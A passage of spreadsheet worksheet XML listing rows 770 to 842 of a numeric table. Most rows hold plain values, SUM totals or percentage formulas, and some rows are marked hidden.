      <c r="D770" s="100">
        <v>174</v>
      </c>
      <c r="E770" s="173">
        <v>174</v>
      </c>
      <c r="F770" s="174"/>
      <c r="G770" s="172"/>
    </row>
    <row r="771" spans="1:7" ht="17.25" customHeight="1">
      <c r="A771" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B771" s="100"/>
      <c r="C771" s="100"/>
      <c r="D771" s="100">
        <v>100</v>
      </c>
      <c r="E771" s="173">
        <v>100</v>
      </c>
      <c r="F771" s="174"/>
      <c r="G771" s="172"/>
    </row>
    <row r="772" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A772" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B772" s="100"/>
      <c r="C772" s="100"/>
      <c r="D772" s="100">
        <v>0</v>
      </c>
      <c r="E772" s="173"/>
      <c r="F772" s="174"/>
      <c r="G772" s="172"/>
    </row>
    <row r="773" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A773" s="128" t="s">
        <v>944</v>
      </c>
      <c r="B773" s="100"/>
      <c r="C773" s="100"/>
      <c r="D773" s="100">
        <v>0</v>
      </c>
      <c r="E773" s="173"/>
      <c r="F773" s="174"/>
      <c r="G773" s="172"/>
    </row>
    <row r="774" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A774" s="128" t="s">
        <v>945</v>
      </c>
      <c r="B774" s="100"/>
      <c r="C774" s="100"/>
      <c r="D774" s="100">
        <v>0</v>
      </c>
      <c r="E774" s="173"/>
      <c r="F774" s="174"/>
      <c r="G774" s="172"/>
    </row>
    <row r="775" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A775" s="128" t="s">
        <v>946</v>
      </c>
      <c r="B775" s="100"/>
      <c r="C775" s="100"/>
      <c r="D775" s="100">
        <v>0</v>
      </c>
      <c r="E775" s="173"/>
      <c r="F775" s="174"/>
      <c r="G775" s="172"/>
    </row>
    <row r="776" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A776" s="128" t="s">
        <v>947</v>
      </c>
      <c r="B776" s="100"/>
      <c r="C776" s="100"/>
      <c r="D776" s="100">
        <v>0</v>
      </c>
      <c r="E776" s="173"/>
      <c r="F776" s="174"/>
      <c r="G776" s="172"/>
    </row>
    <row r="777" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A777" s="128" t="s">
        <v>948</v>
      </c>
      <c r="B777" s="100"/>
      <c r="C777" s="100"/>
      <c r="D777" s="100">
        <v>0</v>
      </c>
      <c r="E777" s="173"/>
      <c r="F777" s="174"/>
      <c r="G777" s="172"/>
    </row>
    <row r="778" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A778" s="128" t="s">
        <v>949</v>
      </c>
      <c r="B778" s="100"/>
      <c r="C778" s="100"/>
      <c r="D778" s="100">
        <v>0</v>
      </c>
      <c r="E778" s="173"/>
      <c r="F778" s="174"/>
      <c r="G778" s="172"/>
    </row>
    <row r="779" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A779" s="128" t="s">
        <v>950</v>
      </c>
      <c r="B779" s="100"/>
      <c r="C779" s="100"/>
      <c r="D779" s="100">
        <v>0</v>
      </c>
      <c r="E779" s="173"/>
      <c r="F779" s="174"/>
      <c r="G779" s="172"/>
    </row>
    <row r="780" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A780" s="128" t="s">
        <v>415</v>
      </c>
      <c r="B780" s="100"/>
      <c r="C780" s="100"/>
      <c r="D780" s="100">
        <v>0</v>
      </c>
      <c r="E780" s="173"/>
      <c r="F780" s="174"/>
      <c r="G780" s="172"/>
    </row>
    <row r="781" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A781" s="128" t="s">
        <v>951</v>
      </c>
      <c r="B781" s="100"/>
      <c r="C781" s="100"/>
      <c r="D781" s="100">
        <v>0</v>
      </c>
      <c r="E781" s="173"/>
      <c r="F781" s="174"/>
      <c r="G781" s="172"/>
    </row>
    <row r="782" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A782" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B782" s="100"/>
      <c r="C782" s="100"/>
      <c r="D782" s="100">
        <v>0</v>
      </c>
      <c r="E782" s="173"/>
      <c r="F782" s="174"/>
      <c r="G782" s="172"/>
    </row>
    <row r="783" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A783" s="128" t="s">
        <v>952</v>
      </c>
      <c r="B783" s="100"/>
      <c r="C783" s="100"/>
      <c r="D783" s="100">
        <v>0</v>
      </c>
      <c r="E783" s="173"/>
      <c r="F783" s="174"/>
      <c r="G783" s="172"/>
    </row>
    <row r="784" spans="1:7" ht="17.25" customHeight="1">
      <c r="A784" s="128" t="s">
        <v>953</v>
      </c>
      <c r="B784" s="100"/>
      <c r="C784" s="100"/>
      <c r="D784" s="100">
        <v>543</v>
      </c>
      <c r="E784" s="173"/>
      <c r="F784" s="174"/>
      <c r="G784" s="172"/>
    </row>
    <row r="785" spans="1:7" ht="17.25" customHeight="1">
      <c r="A785" s="128" t="s">
        <v>954</v>
      </c>
      <c r="B785" s="100">
        <f>SUM(B786,B797,B798,B801,B802,B803)</f>
        <v>72927</v>
      </c>
      <c r="C785" s="100">
        <f>SUM(C786,C797,C798,C801,C802,C803)</f>
        <v>14826</v>
      </c>
      <c r="D785" s="100">
        <f>SUM(D786,D797,D798,D801,D802,D803)</f>
        <v>88241</v>
      </c>
      <c r="E785" s="173">
        <f>SUM(E786,E797,E798,E801,E802,E803)</f>
        <v>15303</v>
      </c>
      <c r="F785" s="174">
        <f aca="true" t="shared" si="48" ref="F785:F787">E785/C785*100</f>
        <v>103.21732092270335</v>
      </c>
      <c r="G785" s="172"/>
    </row>
    <row r="786" spans="1:7" ht="17.25" customHeight="1">
      <c r="A786" s="128" t="s">
        <v>955</v>
      </c>
      <c r="B786" s="100">
        <f>SUM(B787:B796)</f>
        <v>6008</v>
      </c>
      <c r="C786" s="100">
        <f>SUM(C787:C796)</f>
        <v>6008</v>
      </c>
      <c r="D786" s="100">
        <f>SUM(D787:D796)</f>
        <v>5769</v>
      </c>
      <c r="E786" s="173">
        <f>SUM(E787:E796)</f>
        <v>5769</v>
      </c>
      <c r="F786" s="174">
        <f t="shared" si="48"/>
        <v>96.0219707057257</v>
      </c>
      <c r="G786" s="172"/>
    </row>
    <row r="787" spans="1:7" ht="17.25" customHeight="1">
      <c r="A787" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B787" s="100">
        <v>1390</v>
      </c>
      <c r="C787" s="100">
        <v>1390</v>
      </c>
      <c r="D787" s="100">
        <v>1260</v>
      </c>
      <c r="E787" s="173">
        <v>1260</v>
      </c>
      <c r="F787" s="174">
        <f t="shared" si="48"/>
        <v>90.64748201438849</v>
      </c>
      <c r="G787" s="172"/>
    </row>
    <row r="788" spans="1:7" ht="17.25" customHeight="1">
      <c r="A788" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B788" s="100">
        <v>0</v>
      </c>
      <c r="C788" s="100"/>
      <c r="D788" s="100">
        <v>0</v>
      </c>
      <c r="E788" s="173"/>
      <c r="F788" s="174"/>
      <c r="G788" s="172"/>
    </row>
    <row r="789" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A789" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B789" s="100">
        <v>0</v>
      </c>
      <c r="C789" s="100"/>
      <c r="D789" s="100">
        <v>0</v>
      </c>
      <c r="E789" s="173"/>
      <c r="F789" s="174"/>
      <c r="G789" s="172"/>
    </row>
    <row r="790" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A790" s="128" t="s">
        <v>956</v>
      </c>
      <c r="B790" s="100">
        <v>0</v>
      </c>
      <c r="C790" s="100"/>
      <c r="D790" s="100">
        <v>0</v>
      </c>
      <c r="E790" s="173"/>
      <c r="F790" s="174"/>
      <c r="G790" s="172"/>
    </row>
    <row r="791" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A791" s="128" t="s">
        <v>957</v>
      </c>
      <c r="B791" s="100">
        <v>0</v>
      </c>
      <c r="C791" s="100"/>
      <c r="D791" s="100">
        <v>0</v>
      </c>
      <c r="E791" s="173"/>
      <c r="F791" s="174"/>
      <c r="G791" s="172"/>
    </row>
    <row r="792" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A792" s="128" t="s">
        <v>958</v>
      </c>
      <c r="B792" s="100">
        <v>0</v>
      </c>
      <c r="C792" s="100"/>
      <c r="D792" s="100">
        <v>0</v>
      </c>
      <c r="E792" s="173"/>
      <c r="F792" s="174"/>
      <c r="G792" s="172"/>
    </row>
    <row r="793" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A793" s="128" t="s">
        <v>959</v>
      </c>
      <c r="B793" s="100">
        <v>0</v>
      </c>
      <c r="C793" s="100"/>
      <c r="D793" s="100">
        <v>0</v>
      </c>
      <c r="E793" s="173"/>
      <c r="F793" s="174"/>
      <c r="G793" s="172"/>
    </row>
    <row r="794" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A794" s="128" t="s">
        <v>960</v>
      </c>
      <c r="B794" s="100">
        <v>0</v>
      </c>
      <c r="C794" s="100"/>
      <c r="D794" s="100">
        <v>0</v>
      </c>
      <c r="E794" s="173"/>
      <c r="F794" s="174"/>
      <c r="G794" s="172"/>
    </row>
    <row r="795" spans="1:7" ht="17.25" customHeight="1">
      <c r="A795" s="128" t="s">
        <v>961</v>
      </c>
      <c r="B795" s="100">
        <v>0</v>
      </c>
      <c r="C795" s="100"/>
      <c r="D795" s="100">
        <v>0</v>
      </c>
      <c r="E795" s="173"/>
      <c r="F795" s="174"/>
      <c r="G795" s="172"/>
    </row>
    <row r="796" spans="1:7" ht="17.25" customHeight="1">
      <c r="A796" s="128" t="s">
        <v>962</v>
      </c>
      <c r="B796" s="100">
        <v>4618</v>
      </c>
      <c r="C796" s="100">
        <v>4618</v>
      </c>
      <c r="D796" s="100">
        <f>2009+2500</f>
        <v>4509</v>
      </c>
      <c r="E796" s="173">
        <f>2009+2500</f>
        <v>4509</v>
      </c>
      <c r="F796" s="174">
        <f aca="true" t="shared" si="49" ref="F796:F798">E796/C796*100</f>
        <v>97.63967085318319</v>
      </c>
      <c r="G796" s="172"/>
    </row>
    <row r="797" spans="1:7" ht="17.25" customHeight="1">
      <c r="A797" s="128" t="s">
        <v>963</v>
      </c>
      <c r="B797" s="100">
        <v>2618</v>
      </c>
      <c r="C797" s="100">
        <v>618</v>
      </c>
      <c r="D797" s="100">
        <v>981</v>
      </c>
      <c r="E797" s="173">
        <v>981</v>
      </c>
      <c r="F797" s="174">
        <f t="shared" si="49"/>
        <v>158.7378640776699</v>
      </c>
      <c r="G797" s="172"/>
    </row>
    <row r="798" spans="1:7" ht="17.25" customHeight="1">
      <c r="A798" s="128" t="s">
        <v>964</v>
      </c>
      <c r="B798" s="100">
        <f>SUM(B799:B800)</f>
        <v>337</v>
      </c>
      <c r="C798" s="100">
        <f>SUM(C799:C800)</f>
        <v>337</v>
      </c>
      <c r="D798" s="100">
        <f>SUM(D799:D800)</f>
        <v>5148</v>
      </c>
      <c r="E798" s="173">
        <f>SUM(E799:E800)</f>
        <v>148</v>
      </c>
      <c r="F798" s="174">
        <f t="shared" si="49"/>
        <v>43.916913946587535</v>
      </c>
      <c r="G798" s="172"/>
    </row>
    <row r="799" spans="1:7" ht="17.25" customHeight="1">
      <c r="A799" s="128" t="s">
        <v>965</v>
      </c>
      <c r="B799" s="100">
        <v>0</v>
      </c>
      <c r="C799" s="100"/>
      <c r="D799" s="100">
        <v>0</v>
      </c>
      <c r="E799" s="173"/>
      <c r="F799" s="174"/>
      <c r="G799" s="172"/>
    </row>
    <row r="800" spans="1:7" ht="17.25" customHeight="1">
      <c r="A800" s="128" t="s">
        <v>966</v>
      </c>
      <c r="B800" s="100">
        <v>337</v>
      </c>
      <c r="C800" s="100">
        <v>337</v>
      </c>
      <c r="D800" s="100">
        <v>5148</v>
      </c>
      <c r="E800" s="173">
        <v>148</v>
      </c>
      <c r="F800" s="174">
        <f aca="true" t="shared" si="50" ref="F800:F806">E800/C800*100</f>
        <v>43.916913946587535</v>
      </c>
      <c r="G800" s="172"/>
    </row>
    <row r="801" spans="1:7" ht="17.25" customHeight="1">
      <c r="A801" s="128" t="s">
        <v>967</v>
      </c>
      <c r="B801" s="100">
        <f>628+5735</f>
        <v>6363</v>
      </c>
      <c r="C801" s="100">
        <f>628+5735</f>
        <v>6363</v>
      </c>
      <c r="D801" s="100">
        <v>14714</v>
      </c>
      <c r="E801" s="173">
        <v>6905</v>
      </c>
      <c r="F801" s="174">
        <f t="shared" si="50"/>
        <v>108.51799465660852</v>
      </c>
      <c r="G801" s="172"/>
    </row>
    <row r="802" spans="1:7" ht="17.25" customHeight="1">
      <c r="A802" s="128" t="s">
        <v>968</v>
      </c>
      <c r="B802" s="100">
        <v>0</v>
      </c>
      <c r="C802" s="100"/>
      <c r="D802" s="100">
        <v>0</v>
      </c>
      <c r="E802" s="173"/>
      <c r="F802" s="174"/>
      <c r="G802" s="172"/>
    </row>
    <row r="803" spans="1:7" ht="17.25" customHeight="1">
      <c r="A803" s="128" t="s">
        <v>969</v>
      </c>
      <c r="B803" s="100">
        <v>57601</v>
      </c>
      <c r="C803" s="100">
        <v>1500</v>
      </c>
      <c r="D803" s="100">
        <v>61629</v>
      </c>
      <c r="E803" s="173">
        <v>1500</v>
      </c>
      <c r="F803" s="174">
        <f t="shared" si="50"/>
        <v>100</v>
      </c>
      <c r="G803" s="172"/>
    </row>
    <row r="804" spans="1:7" ht="17.25" customHeight="1">
      <c r="A804" s="128" t="s">
        <v>970</v>
      </c>
      <c r="B804" s="173">
        <f>SUM(B805,B831,B856,B884,B895,B902,B909,B912)</f>
        <v>39918</v>
      </c>
      <c r="C804" s="173">
        <f>SUM(C805,C831,C856,C884,C895,C902,C909,C912)</f>
        <v>21912</v>
      </c>
      <c r="D804" s="173">
        <f>SUM(D805,D831,D856,D884,D895,D902,D909,D912)</f>
        <v>98490</v>
      </c>
      <c r="E804" s="173">
        <f>SUM(E805,E831,E856,E884,E895,E902,E909,E912)</f>
        <v>23087</v>
      </c>
      <c r="F804" s="174">
        <f t="shared" si="50"/>
        <v>105.36235852500913</v>
      </c>
      <c r="G804" s="172"/>
    </row>
    <row r="805" spans="1:7" ht="17.25" customHeight="1">
      <c r="A805" s="128" t="s">
        <v>971</v>
      </c>
      <c r="B805" s="100">
        <f>SUM(B806:B830)</f>
        <v>7915</v>
      </c>
      <c r="C805" s="100">
        <f>SUM(C806:C830)</f>
        <v>7643</v>
      </c>
      <c r="D805" s="100">
        <f>SUM(D806:D830)</f>
        <v>64991</v>
      </c>
      <c r="E805" s="173">
        <f>SUM(E806:E830)</f>
        <v>7833</v>
      </c>
      <c r="F805" s="174">
        <f t="shared" si="50"/>
        <v>102.48593484233939</v>
      </c>
      <c r="G805" s="172"/>
    </row>
    <row r="806" spans="1:7" ht="17.25" customHeight="1">
      <c r="A806" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B806" s="100">
        <v>1239</v>
      </c>
      <c r="C806" s="100">
        <v>1239</v>
      </c>
      <c r="D806" s="100">
        <v>1490</v>
      </c>
      <c r="E806" s="173">
        <v>1490</v>
      </c>
      <c r="F806" s="174">
        <f t="shared" si="50"/>
        <v>120.25827280064567</v>
      </c>
      <c r="G806" s="172"/>
    </row>
    <row r="807" spans="1:7" ht="17.25" customHeight="1">
      <c r="A807" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B807" s="100">
        <v>0</v>
      </c>
      <c r="C807" s="100"/>
      <c r="D807" s="100">
        <v>0</v>
      </c>
      <c r="E807" s="173"/>
      <c r="F807" s="174"/>
      <c r="G807" s="172"/>
    </row>
    <row r="808" spans="1:7" ht="17.25" customHeight="1">
      <c r="A808" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B808" s="100">
        <v>0</v>
      </c>
      <c r="C808" s="100"/>
      <c r="D808" s="100">
        <v>0</v>
      </c>
      <c r="E808" s="173"/>
      <c r="F808" s="174"/>
      <c r="G808" s="172"/>
    </row>
    <row r="809" spans="1:7" ht="17.25" customHeight="1">
      <c r="A809" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B809" s="100">
        <v>2423</v>
      </c>
      <c r="C809" s="100">
        <v>2423</v>
      </c>
      <c r="D809" s="100">
        <v>2482</v>
      </c>
      <c r="E809" s="173">
        <v>2482</v>
      </c>
      <c r="F809" s="174">
        <f aca="true" t="shared" si="51" ref="F809:F815">E809/C809*100</f>
        <v>102.43499793644241</v>
      </c>
      <c r="G809" s="172"/>
    </row>
    <row r="810" spans="1:7" ht="17.25" customHeight="1">
      <c r="A810" s="128" t="s">
        <v>972</v>
      </c>
      <c r="B810" s="100">
        <v>0</v>
      </c>
      <c r="C810" s="100"/>
      <c r="D810" s="100">
        <v>0</v>
      </c>
      <c r="E810" s="173"/>
      <c r="F810" s="174"/>
      <c r="G810" s="172"/>
    </row>
    <row r="811" spans="1:7" ht="17.25" customHeight="1">
      <c r="A811" s="128" t="s">
        <v>973</v>
      </c>
      <c r="B811" s="100">
        <v>155</v>
      </c>
      <c r="C811" s="100">
        <v>155</v>
      </c>
      <c r="D811" s="100">
        <v>150</v>
      </c>
      <c r="E811" s="173">
        <v>150</v>
      </c>
      <c r="F811" s="174">
        <f t="shared" si="51"/>
        <v>96.7741935483871</v>
      </c>
      <c r="G811" s="172"/>
    </row>
    <row r="812" spans="1:7" ht="17.25" customHeight="1">
      <c r="A812" s="128" t="s">
        <v>974</v>
      </c>
      <c r="B812" s="100">
        <v>230</v>
      </c>
      <c r="C812" s="100">
        <v>230</v>
      </c>
      <c r="D812" s="100">
        <v>205</v>
      </c>
      <c r="E812" s="173">
        <v>205</v>
      </c>
      <c r="F812" s="174">
        <f t="shared" si="51"/>
        <v>89.13043478260869</v>
      </c>
      <c r="G812" s="172"/>
    </row>
    <row r="813" spans="1:7" ht="17.25" customHeight="1">
      <c r="A813" s="128" t="s">
        <v>975</v>
      </c>
      <c r="B813" s="100">
        <v>80</v>
      </c>
      <c r="C813" s="100">
        <v>80</v>
      </c>
      <c r="D813" s="100">
        <v>30</v>
      </c>
      <c r="E813" s="173">
        <v>30</v>
      </c>
      <c r="F813" s="174">
        <f t="shared" si="51"/>
        <v>37.5</v>
      </c>
      <c r="G813" s="172"/>
    </row>
    <row r="814" spans="1:7" ht="17.25" customHeight="1">
      <c r="A814" s="128" t="s">
        <v>976</v>
      </c>
      <c r="B814" s="100">
        <v>8</v>
      </c>
      <c r="C814" s="100">
        <v>8</v>
      </c>
      <c r="D814" s="100">
        <v>6</v>
      </c>
      <c r="E814" s="173">
        <v>6</v>
      </c>
      <c r="F814" s="174">
        <f t="shared" si="51"/>
        <v>75</v>
      </c>
      <c r="G814" s="172"/>
    </row>
    <row r="815" spans="1:7" ht="17.25" customHeight="1">
      <c r="A815" s="128" t="s">
        <v>977</v>
      </c>
      <c r="B815" s="100">
        <v>20</v>
      </c>
      <c r="C815" s="100">
        <v>20</v>
      </c>
      <c r="D815" s="100">
        <v>10</v>
      </c>
      <c r="E815" s="173">
        <v>10</v>
      </c>
      <c r="F815" s="174">
        <f t="shared" si="51"/>
        <v>50</v>
      </c>
      <c r="G815" s="172"/>
    </row>
    <row r="816" spans="1:7" ht="17.25" customHeight="1">
      <c r="A816" s="128" t="s">
        <v>978</v>
      </c>
      <c r="B816" s="100">
        <v>0</v>
      </c>
      <c r="C816" s="100"/>
      <c r="D816" s="100">
        <v>0</v>
      </c>
      <c r="E816" s="173"/>
      <c r="F816" s="174"/>
      <c r="G816" s="172"/>
    </row>
    <row r="817" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A817" s="128" t="s">
        <v>979</v>
      </c>
      <c r="B817" s="100">
        <v>0</v>
      </c>
      <c r="C817" s="100"/>
      <c r="D817" s="100">
        <v>0</v>
      </c>
      <c r="E817" s="173"/>
      <c r="F817" s="174"/>
      <c r="G817" s="172"/>
    </row>
    <row r="818" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A818" s="128" t="s">
        <v>980</v>
      </c>
      <c r="B818" s="100">
        <v>0</v>
      </c>
      <c r="C818" s="100"/>
      <c r="D818" s="100">
        <v>0</v>
      </c>
      <c r="E818" s="173"/>
      <c r="F818" s="174"/>
      <c r="G818" s="172"/>
    </row>
    <row r="819" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A819" s="128" t="s">
        <v>981</v>
      </c>
      <c r="B819" s="100">
        <v>0</v>
      </c>
      <c r="C819" s="100"/>
      <c r="D819" s="100">
        <v>0</v>
      </c>
      <c r="E819" s="173"/>
      <c r="F819" s="174"/>
      <c r="G819" s="172"/>
    </row>
    <row r="820" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A820" s="128" t="s">
        <v>982</v>
      </c>
      <c r="B820" s="100">
        <v>0</v>
      </c>
      <c r="C820" s="100"/>
      <c r="D820" s="100">
        <v>0</v>
      </c>
      <c r="E820" s="173"/>
      <c r="F820" s="174"/>
      <c r="G820" s="172"/>
    </row>
    <row r="821" spans="1:7" ht="17.25" customHeight="1">
      <c r="A821" s="128" t="s">
        <v>983</v>
      </c>
      <c r="B821" s="100">
        <v>50</v>
      </c>
      <c r="C821" s="100">
        <v>50</v>
      </c>
      <c r="D821" s="100">
        <f>50317</f>
        <v>50317</v>
      </c>
      <c r="E821" s="173">
        <f>50317-50287</f>
        <v>30</v>
      </c>
      <c r="F821" s="174">
        <f>E821/C821*100</f>
        <v>60</v>
      </c>
      <c r="G821" s="172"/>
    </row>
    <row r="822" spans="1:7" ht="17.25" customHeight="1">
      <c r="A822" s="128" t="s">
        <v>984</v>
      </c>
      <c r="B822" s="100">
        <v>0</v>
      </c>
      <c r="C822" s="100"/>
      <c r="D822" s="100">
        <v>0</v>
      </c>
      <c r="E822" s="173"/>
      <c r="F822" s="174"/>
      <c r="G822" s="172"/>
    </row>
    <row r="823" spans="1:7" ht="17.25" customHeight="1">
      <c r="A823" s="128" t="s">
        <v>985</v>
      </c>
      <c r="B823" s="100">
        <v>2000</v>
      </c>
      <c r="C823" s="100">
        <v>2000</v>
      </c>
      <c r="D823" s="100">
        <v>2000</v>
      </c>
      <c r="E823" s="173">
        <v>2000</v>
      </c>
      <c r="F823" s="174">
        <f>E823/C823*100</f>
        <v>100</v>
      </c>
      <c r="G823" s="172"/>
    </row>
    <row r="824" spans="1:7" ht="17.25" customHeight="1">
      <c r="A824" s="128" t="s">
        <v>986</v>
      </c>
      <c r="B824" s="100"/>
      <c r="C824" s="100"/>
      <c r="D824" s="100">
        <v>0</v>
      </c>
      <c r="E824" s="173"/>
      <c r="F824" s="174"/>
      <c r="G824" s="172"/>
    </row>
    <row r="825" spans="1:7" ht="17.25" customHeight="1">
      <c r="A825" s="128" t="s">
        <v>987</v>
      </c>
      <c r="B825" s="100">
        <v>0</v>
      </c>
      <c r="C825" s="100"/>
      <c r="D825" s="100">
        <v>0</v>
      </c>
      <c r="E825" s="173"/>
      <c r="F825" s="174"/>
      <c r="G825" s="172"/>
    </row>
    <row r="826" spans="1:7" ht="17.25" customHeight="1">
      <c r="A826" s="128" t="s">
        <v>988</v>
      </c>
      <c r="B826" s="100">
        <v>0</v>
      </c>
      <c r="C826" s="100"/>
      <c r="D826" s="100">
        <v>6871</v>
      </c>
      <c r="E826" s="173"/>
      <c r="F826" s="174"/>
      <c r="G826" s="172"/>
    </row>
    <row r="827" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A827" s="128" t="s">
        <v>989</v>
      </c>
      <c r="B827" s="100">
        <v>0</v>
      </c>
      <c r="C827" s="100"/>
      <c r="D827" s="100">
        <v>0</v>
      </c>
      <c r="E827" s="173"/>
      <c r="F827" s="174"/>
      <c r="G827" s="172"/>
    </row>
    <row r="828" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A828" s="128" t="s">
        <v>990</v>
      </c>
      <c r="B828" s="100">
        <v>0</v>
      </c>
      <c r="C828" s="100"/>
      <c r="D828" s="100">
        <v>0</v>
      </c>
      <c r="E828" s="173"/>
      <c r="F828" s="174"/>
      <c r="G828" s="172"/>
    </row>
    <row r="829" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A829" s="128" t="s">
        <v>991</v>
      </c>
      <c r="B829" s="100"/>
      <c r="C829" s="100"/>
      <c r="D829" s="100">
        <v>0</v>
      </c>
      <c r="E829" s="173"/>
      <c r="F829" s="174"/>
      <c r="G829" s="172"/>
    </row>
    <row r="830" spans="1:7" ht="17.25" customHeight="1">
      <c r="A830" s="128" t="s">
        <v>992</v>
      </c>
      <c r="B830" s="100">
        <f>3810-2000-100</f>
        <v>1710</v>
      </c>
      <c r="C830" s="100">
        <f>3538-2000-100</f>
        <v>1438</v>
      </c>
      <c r="D830" s="100">
        <f>1430</f>
        <v>1430</v>
      </c>
      <c r="E830" s="173">
        <f>1430</f>
        <v>1430</v>
      </c>
      <c r="F830" s="174">
        <f aca="true" t="shared" si="52" ref="F830:F832">E830/C830*100</f>
        <v>99.44367176634215</v>
      </c>
      <c r="G830" s="172"/>
    </row>
    <row r="831" spans="1:7" ht="17.25" customHeight="1">
      <c r="A831" s="128" t="s">
        <v>993</v>
      </c>
      <c r="B831" s="100">
        <f>SUM(B832:B855)</f>
        <v>4028</v>
      </c>
      <c r="C831" s="100">
        <f>SUM(C832:C855)</f>
        <v>940</v>
      </c>
      <c r="D831" s="100">
        <f>SUM(D832:D855)</f>
        <v>1901</v>
      </c>
      <c r="E831" s="173">
        <f>SUM(E832:E855)</f>
        <v>694</v>
      </c>
      <c r="F831" s="174">
        <f t="shared" si="52"/>
        <v>73.82978723404256</v>
      </c>
      <c r="G831" s="172"/>
    </row>
    <row r="832" spans="1:7" ht="17.25" customHeight="1">
      <c r="A832" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B832" s="100">
        <v>828</v>
      </c>
      <c r="C832" s="100">
        <v>828</v>
      </c>
      <c r="D832" s="100">
        <v>0</v>
      </c>
      <c r="E832" s="173"/>
      <c r="F832" s="174">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="G832" s="172"/>
    </row>
    <row r="833" spans="1:7" ht="17.25" customHeight="1">
      <c r="A833" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B833" s="100">
        <v>0</v>
      </c>
      <c r="C833" s="100"/>
      <c r="D833" s="100">
        <v>0</v>
      </c>
      <c r="E833" s="173"/>
      <c r="F833" s="174"/>
      <c r="G833" s="172"/>
    </row>
    <row r="834" spans="1:7" ht="17.25" customHeight="1">
      <c r="A834" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B834" s="100">
        <v>0</v>
      </c>
      <c r="C834" s="100"/>
      <c r="D834" s="100">
        <v>0</v>
      </c>
      <c r="E834" s="173"/>
      <c r="F834" s="174"/>
      <c r="G834" s="172"/>
    </row>
    <row r="835" spans="1:7" ht="17.25" customHeight="1">
      <c r="A835" s="128" t="s">
        <v>994</v>
      </c>
      <c r="B835" s="100">
        <v>0</v>
      </c>
      <c r="C835" s="100"/>
      <c r="D835" s="100">
        <v>458</v>
      </c>
      <c r="E835" s="173">
        <v>458</v>
      </c>
      <c r="F835" s="174"/>
      <c r="G835" s="172"/>
    </row>
    <row r="836" spans="1:7" ht="17.25" customHeight="1">
      <c r="A836" s="128" t="s">
        <v>995</v>
      </c>
      <c r="B836" s="100">
        <v>5</v>
      </c>
      <c r="C836" s="100">
        <v>5</v>
      </c>
      <c r="D836" s="100">
        <v>0</v>
      </c>
      <c r="E836" s="173"/>
      <c r="F836" s="174">
        <f>E836/C836*100</f>
        <v>0</v>
      </c>
      <c r="G836" s="172"/>
    </row>
    <row r="837" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A837" s="128" t="s">
        <v>996</v>
      </c>
      <c r="B837" s="100">
        <v>0</v>
      </c>
      <c r="C837" s="100"/>
      <c r="D837" s="100">
        <v>0</v>
      </c>
      <c r="E837" s="173"/>
      <c r="F837" s="174"/>
      <c r="G837" s="172"/>
    </row>
    <row r="838" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A838" s="128" t="s">
        <v>997</v>
      </c>
      <c r="B838" s="100">
        <v>0</v>
      </c>
      <c r="C838" s="100"/>
      <c r="D838" s="100">
        <v>0</v>
      </c>
      <c r="E838" s="173"/>
      <c r="F838" s="174"/>
      <c r="G838" s="172"/>
    </row>
    <row r="839" spans="1:7" ht="17.25" customHeight="1">
      <c r="A839" s="128" t="s">
        <v>998</v>
      </c>
      <c r="B839" s="100">
        <v>6</v>
      </c>
      <c r="C839" s="100"/>
      <c r="D839" s="100">
        <v>0</v>
      </c>
      <c r="E839" s="173"/>
      <c r="F839" s="174"/>
      <c r="G839" s="172"/>
    </row>
    <row r="840" spans="1:7" ht="17.25" customHeight="1">
      <c r="A840" s="128" t="s">
        <v>999</v>
      </c>
      <c r="B840" s="100">
        <v>3000</v>
      </c>
      <c r="C840" s="100"/>
      <c r="D840" s="100">
        <v>1000</v>
      </c>
      <c r="E840" s="173"/>
      <c r="F840" s="174"/>
      <c r="G840" s="172"/>
    </row>
    <row r="841" spans="1:7" ht="17.25" customHeight="1">
      <c r="A841" s="128" t="s">
        <v>1000</v>
      </c>
      <c r="B841" s="100">
        <v>0</v>
      </c>
      <c r="C841" s="100"/>
      <c r="D841" s="100">
        <v>0</v>
      </c>
      <c r="E841" s="173"/>
      <c r="F841" s="174"/>
      <c r="G841" s="172"/>
    </row>
    <row r="842" spans="1:7" ht="17.25" customHeight="1">
      <c r="A842" s="128" t="s">
        <v>1001</v>
      </c>
